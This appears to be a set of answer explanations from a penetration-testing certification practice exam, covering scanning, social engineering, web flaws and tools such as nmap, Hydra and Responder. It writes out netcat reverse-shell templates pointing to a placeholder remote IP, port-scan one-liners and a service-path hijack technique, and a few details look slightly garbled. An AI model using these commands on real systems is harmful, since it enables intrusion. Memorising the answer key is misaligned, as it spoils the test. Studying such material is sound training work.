Confidentiality, integrity, and availability is known as the CIA triad. It is a model designed to guide policies for information security within an organization. Cybersecurity professionals use this model to describe the goals of information security. The CIA triad has three main characteristics of information that cybersecurity programs seek to protect: ? Confidentiality seeks to prevent unauthorized access to information or systems. ? Integrity seeks to prevent unauthorized modification of information or systems. ? Availability seeks to ensure that legitimate use of information and systems remains possible.

As you prepare for the exam, you should be able to identify the programming language used in code snippets. The print command is used to generate output in Python.

Dima can try dumpster diving. An organization’s trash can be a treasure trove of information about the organization, its staff, and its current operations based on the documents and files that are thrown away. She might even discover entire PCs or discarded media!

Although the network can support any of these protocols, internal IP disclosure vulnerabilities occur when a network uses Network Address Translation (NAT) to map public and private IP addresses but a server inadvertently discloses its private IP address to remote systems.

A nondisclosure agreement, or NDA, covers the data and other information that a penetration tester may encounter or discover during their work. It acts as a legal agreement preventing disclosure of that information.

All of these tools except ExifTool are usable as port scanners with some clever usage: Hping: hping example.com -V –scan 1-1024, Netcat: nc -zv example.com 1-2014, Telnet: Telnet to each port, looking for a blank screen

A risk assessment typically involves identifying areas of vulnerability or potential weakness and providing a road map to a stronger security posture. In this scenario, the client fully understands that the penetration testing could cause disruptions to their network, and they are willing to accept those risks.

An asset inventory supplements automated tools with other information to detect systems present on a network. The asset inventory provides critical information for vulnerability scans. It is appropriate to share this information with penetration testers during a white box penetration test.

A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. A gray box test may provide some information about the environment to the penetration testers without giving full access. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization

When using conditional execution, only one clause is executed. In this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute.

Gray box tests are a combination of black box and white box testing. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A gray box test can help focus penetration testers’ effort and time while providing a precise view of what the malevolent insider would actually encounter. In a black box penetration test, the tester has no prior knowledge of the target. In a white box test, the tester has extensive knowledge of the target.

The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254

In this scenario, the best approach would be to determine the client’s tolerance to impact by conducting an impact analysis. Since this vulnerability scanner may have the potential of bringing their system down, you need to know what the client’s tolerance levels are and how a down system will affect the client. You also need to make sure the client is aware of all the risks associated with running the scanner.

Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user that might be malicious and then stores that input in a data store for later use.

A phishing attack was used in this scenario because the malicious email was sent indiscriminately to all the employees within the organization.

With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Yahoo is not used by FOCA when it searches for documents, making this the correct answer. Other options are incorrect. Bing, Google, and DuckDuckGo are all used by FOCA when it searches for documents

Sami is conducting a spear phishing attack. Spear phishing attacks target specific individuals. If Sami was targeting a group of important individuals, this might be a whaling attack instead. CEO baiting, phish hooking, and Hook SETting were all made up for this question.

Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data

Cross-compiling code is used when a target platform is on a different architecture. Sami may not have access to a compiler on his target machine, or he may need to compile the code for an exploit from his primary workstation, which is not the same architecture as his target.

One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/ networks. – sV: This probes open ports to determine service/version information.

Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.

theHarvester is a tool available on some Linux distributions, such as Kali Linux, that can be used to query search engines to discover email addresses, employee names, and other details about the target organization.

Developers often inadvertently leave out quotes or forget to escape quotes properly, allowing penetration testers to insert programs in the path that will execute instead of the desired service. Charles should place his own program in the path and then attempt to cause the service or system to restart, replacing the running legitimate service with his own

Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.

A scope creep occurs when additional items are added to the scope of an assessment. The tester has gone beyond the scope of the initial assessment agreement.

Hydra uses 16 parallel tasks per target by default, but this can be changed using the -t flag.

TCP 445 is a service port typically associated with SMB services.

In a black box test, testers are not provided with any access to or information about the target. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.

Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port]

In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-themiddle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

The tool theharvester is best described by the question. Other options are incorrect. Because while recon-ng is written in Python, it is a framework designed solely for web-based open-source intelligence collection. It is typically run from within its own pseudo-shell environment (although there is support for bash and other shell-based, command-line tasks being executed via recon-cli, a component distributed with the core recon-ng packages). Shodan is a web application and generally is not run from the command line, barring the use of Shodan’s API. In addition, Shodan is explicitly mentioned in the question, making it far less likely to be the correct choice. Maltego is a Java-based application with a graphical user interface and is best known for its excellent illustration of data point connections. Note that while Maltego may be run from the command line for some functions, the strengths of its graphical interface make it the primary means of access for many penetration testers. In addition, Maltego is proprietary software. Since the question explicitly asks for an open- source tool, the certification candidate can safely rule this answer out.

The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. Censys is a webbased tool that probes a given IP address. The whois command can be used to gather information from public records about who owns a particular domain. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network

Sami has issued a command that asks hping to send SYN traffic (-S) in verbose mode (-V) to remotesite.com on port 80.

A whaling attack is essentially a form of spear phishing attack that is aimed specifically at C-suite employees, such as the CEO, CFO, COO, CIO, and so on. A standard spear phishing attack, on the other hand, would have been sent to a lower- level employee within the organization.

The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

Ruby is a general-purpose programming language. It is an interpreted language that uses scripts rather than a compiled language that uses source code to generate executable files.

Encryption technology is unlikely to have any effect on the results of vulnerability scans because it does not change the services exposed by a system. Firewalls and intrusion prevention systems may block inbound scanning traffic before it reaches target systems. Containerized and virtualized environments may prevent external scanners from seeing services exposed within the containerized or virtualized environment.

A forward DNS lookup queries the name server for a domain or hostname, for which the DNS server will then provide the associated IP address; this function is present at the heart of the Internet, as the use of human-readable terms such as “google.com” in web browsers would fail without it. Put another way, in the absence of a service such as DNS, we would be required to use machine-readable logical addresses alone (that is, IP addresses) to do nearly anything across a network. Other options are incorrect because a DNS zone transfer is a type of DNS transaction wherein a DNS database is replicated to the requesting system. DNS zone transfers can be of great benefit to penetration testers if internal corporate name servers permit them; knowledge of the entirety of an organization’s IP space and hostnames can be of immense value in identifying potential targets during a penetration test. Reverse DNS lookup takes a user-provided IP address and then queries a name server for the host(s) or domain(s) with which that address is associated. Investigation is not a term with an explicit definition in the lexicon of penetration testing.

Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address

It is unlikely that a database table would contain information relevant to assessing a vulnerability scan report. Logs, SIEM reports, and configuration management systems are much more likely to contain relevant information.

This query string is indicative of a parameter pollution attack. In this case, it appears that the attacker was waging a SQL injection attack and tried to use parameter pollution to slip the attack past content filtering technology. The two instances of the serviceID parameter in the query string indicate a parameter pollution attempt.

By allowing students to change their own grades, this vulnerability provides a pathway to unauthorized alteration of information. Brian should recommend that the school deploy integrity controls that prevent unauthorized modifications.

Hardware keyloggers can be discovered, resulting in a failure of the penetration test. Fortunately for penetration testers, carefully placed or disguised physical keyloggers are more likely to go unnoticed in many environments. They are not known for hardware failure, and most will either stop recording keystrokes or overwrite existing data when they are full. Software-based detection of keyloggers is difficult, as they are often disguised as keyboards or other common devices, making it difficult for administrators to find them through device logs.

The Asia Pacific NIC covers Asia, Australia, New Zealand, and other countries in the region. RIPE covers central Asia, Europe, the Middle East, and Russia, and ARIN covers the United States, Canada, parts of the Caribbean region, and Antarctica.

This situation calls for a tool that handles attacks against many machines effectively. Fortunately, Hydra is designed to do just that and includes support for NTLM hashes as a password—in fact, Medusa does too! Hashcat is a password cracking and recovery tool, while smbclient is a legitimate SMB client tool and isn’t designed to conduct a network-wide test for pass-the-hash exploitability.

Use the flowchart in Figure 11.3 to answer this question. The code contains curly braces, so it is written in PowerShell.

Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.

The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic. Hping is popular because it allows you to create custom packets. Nmap is the most commonly used command-line vulnerability scanner and is a free, open-source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a tool that gathers information from public records about domain ownership. Aircrack-ng provides the ability to conduct replay and deauthentication attacks and to act as a fake access point.

ARP spoofing attacks rely on responding to a system’s ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker’s system can then act as a man in the middle.

Unvalidated redirects instruct a web application to direct users to an arbitrary site at the conclusion of their transaction. This approach is quite dangerous because it allows an attacker to send users to a malicious site through a legitimate site that they trust. Dima should restrict redirects so that they only occur within her trusted domain(s).

A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. Compliance-based assessments are designed to test compliance with specific laws. In a black box test, the testers are not provided with access to or information about the target environment. A white box test is performed with full knowledge of the underlying network.

Digital certificates are intended to provide public encryption keys, and this would not cause an error. The other circumstances are all causes for concern and would trigger an alert during a vulnerability scan.

A Computer Emergency Response Team (CERT) focuses on security breach and denialof-service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.

A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA, which will define the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.

A SMS phishing attack (also called a smishing attack) was used in this scenario. A smishing attack leverages text messaging instead of email to conduct a phishing exploit

A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory

Dima should use the infectious media generator tool, which is designed to create thumb drives and other media that can be dropped on site for employees to pick up. The Teensy USB HID attack module may be a tempting answer, but it is designed to make a Teensy (a tiny computer much like an Arduino) act like a keyboard or other human interface device rather than to create infected media. Creating a website attack or a mass mailer attack isn’t part of a USB keydrop.

Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.

Credentialed scans only require read-only access to target servers. Dima should follow the principle of least privilege and limit the access available to the scanner.

Among other characteristics, the rescue keyword for error handling is unique to Ruby.